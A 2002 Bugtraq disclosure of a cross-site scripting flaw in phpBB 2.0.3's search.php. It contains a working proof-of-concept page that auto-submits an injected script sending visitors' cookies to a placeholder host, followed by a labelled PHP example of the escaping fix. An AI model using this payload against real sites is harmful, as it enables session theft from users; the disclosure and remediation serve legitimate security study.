[28118] in bugtraq


Cross-site Scripting Vulnerability in phpBB 2.0.3

daemon@ATHENA.MIT.EDU (Fabricio Angelett)
Thu Dec 5 16:12:04 2002

Message-ID: <20021203200900.17752.qmail@web11606.mail.yahoo.com>
Date: Tue, 3 Dec 2002 14:09:00 -0600 (CST)
From: Fabricio Angeletti <f_a_a@yahoo.com>
To: BugTraq@securityfocus.com
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit

Hello :)

here is the code
----------------
<html>
<body>
<form method="post" name="search"
action="http://target/search.php?mode=searchuser">
<input type="hidden" name="search_username" value=""/>

</form>
<SCRIPT>
search.search_username.value='Http://savecookie/x.php?Cookie="><script>location=search.search_username.value+document.cookie;</script\>';
document.search.submit();
</script>
</body>
</html>
------------
Works for me using IE 6 SP1 (XP).

Maybe you can do this in a better way, but this
example works really fine.

The problem is search.php: when it shows search_username, you
can put anything, with a few restrictions.

solution:
1 Don't show the last entry or something like that
2 filter the code :p

Bye
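
Added example (not part of the original post and not phpBB's own code): the "filter the code" fix from the message, shown as output encoding of search_username before it is echoed into an attribute value, with the rendered markup parsed to confirm no script element survives. The function names are hypothetical, the UTF-8 charset is an assumption that must match the page's actual encoding, and PHP's DOM extension is assumed to be available.

```php
<?php
// Added example, not phpBB source. render_unescaped, render_escaped and
// count_script_elements are hypothetical names used for illustration.

// Value the browser posts as search_username in the proof of concept above
// (after the JavaScript string escape \> is resolved to >).
$posted = 'Http://savecookie/x.php?Cookie="><script>'
        . 'location=search.search_username.value+document.cookie;</script>';

// Vulnerable pattern: request data concatenated into an attribute value as-is.
function render_unescaped(string $username): string
{
    return '<input type="text" name="search_username" value="' . $username . '" />';
}

// Hardened pattern: encode for the HTML attribute context at output time.
// ENT_QUOTES encodes both " and ', so the value cannot close the attribute.
function render_escaped(string $username): string
{
    $safe = htmlspecialchars($username, ENT_QUOTES, 'UTF-8');
    return '<input type="text" name="search_username" value="' . $safe . '" />';
}

// Parse the markup with an HTML parser and count the <script> elements in it.
function count_script_elements(string $html): int
{
    $doc = new DOMDocument();
    libxml_use_internal_errors(true);   // tolerate tag-soup input
    $doc->loadHTML('<html><body>' . $html . '</body></html>');
    libxml_clear_errors();
    return $doc->getElementsByTagName('script')->length;
}

// Compare both renderers on the same posted value.
foreach (['render_unescaped', 'render_escaped'] as $renderer) {
    $html = $renderer($posted);
    printf("%-17s script elements: %d\n", $renderer, count_script_elements($html));
}
```

Encoding at the point of output keeps the submitted text visible to the user as typed while the browser treats it as data only.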
